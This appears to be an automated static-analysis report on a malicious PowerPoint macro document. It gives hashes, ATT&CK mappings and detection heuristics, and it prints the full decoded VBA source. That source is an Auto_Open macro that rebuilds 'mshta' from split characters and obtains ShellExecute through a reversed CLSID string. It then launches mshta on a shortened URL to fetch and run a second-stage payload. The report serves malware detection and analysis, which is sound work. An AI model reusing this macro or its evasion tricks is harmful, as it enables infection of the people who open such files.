Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 a0b9c53250f2573a…

MALICIOUS

Office (OOXML)

Size: 10.5 KB
First seen: 2021-06-17
MD5: 8d4917417f56f60a1e05c6b6349a4414
SHA-1: 88b64ce0f3a666825b7c2a83582f044fc92d032b
SHA-256: a0b9c53250f2573aae9e51dbe4607e90e4e7dca69e7907c8be936417ebe0754c
Risk score: 172

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1218.005 System Binary Proxy Execution: Mshta
  • T1566.001 Spearphishing Attachment

The sample contains a VBA macro that is executed automatically when the document is opened. The macro reassembles the string "mshta" from single-character literals and passes a URL to it, which is likely a second-stage payload. Splitting the keyword across string literals and the use of an Auto_Open macro both indicate malicious intent. The macro attempts to download and execute a payload from the embedded URL.

Heuristics (7)

  • VBA project inside OOXML [medium] OOXML_VBA (4 related findings)
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/yu.bin)
  • Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script:
    . _
    ShellExecute@ _
    NamakBora _
  • VBA project part renamed to evade filename detection [high] OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
    Matched line in script:
    = _
    GetObject _
    (StrReverse _
  • Auto_Open macro [low] OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script:
    Sub _
    AutO_opEn _
    ()
  • VBA project is signed but not by a recognised publisher [info] VBA_SIGNED_UNTRUSTED
    The VBA project carries a digital signature, but the signer does not chain to a recognised code-signing publisher/CA (self-signed, unknown issuer, or unparseable). A signature alone is not evidence of benignity — malware is routinely self-signed or signed with stolen certificates.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: https://www.bitly.com/asahdjiaiaaarqawn (channel: in document text, OOXML body / shared strings)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 1277 bytes
SHA-256: 96df2f1572c13e286aa93b71a36ca08ddfa244f09228c81914a99eca0b82ad61
Preview of extracted script (first 1,000 lines):
Attribute VB_Name = "Module1"
Sub _
AutO_opEn _
()

Dim _
bora _
As _
New _
Class1

Dim _
NamakBora _
, _
lora _
As _
String
NamakBora _
= _
bora _
. _
getEnumName _
(1)
lora _
= _
bora _
. _
getEnumName _
(2)
lora2 _
= _
bora _
. _
getEnumName _
(2)


bora _
. _
myvalue _
. _
ShellExecute@ _
NamakBora _
, _
lora2

End _
Sub


Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Enum myenum

    myname1 = 1
    myname2 = 2
    myname3 = 3
    myname4 = 4
    
    End Enum
    
Public _
Function _
getEnumName _
(eValue As myenum)
Select _
Case _
eValue
    Case _
    1
        getEnumName _
        = _
        "m" + "s" + "h" + "t" + "a"
    Case _
    2
        getEnumName _
        = _
        "https://www.bitly.com/asahdjiaiaaarqawn"
    End _
    Select
End _
Function


Public _
Function _
myvalue _
()
Set _
myvalue _
= _
GetObject _
(StrReverse _
("000045355444-E94A-EC11-972C-02690731:wen") _
)
End _
Function
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: ppt/yu.bin
Size: 19456 bytes
SHA-256: def3ba6bc930dc5cc4b503813e6d349f8fc186985febf8803153784f082c3c72

Filename: vbaProject_01.bin
Kind: vba-project
Source: OOXML VBA project: ppt/vbaProjectSignature.bin
Size: 1928 bytes
SHA-256: 681a14074e7ffd7d566f011a14eaa288afdd753d225068965936e8f07a729154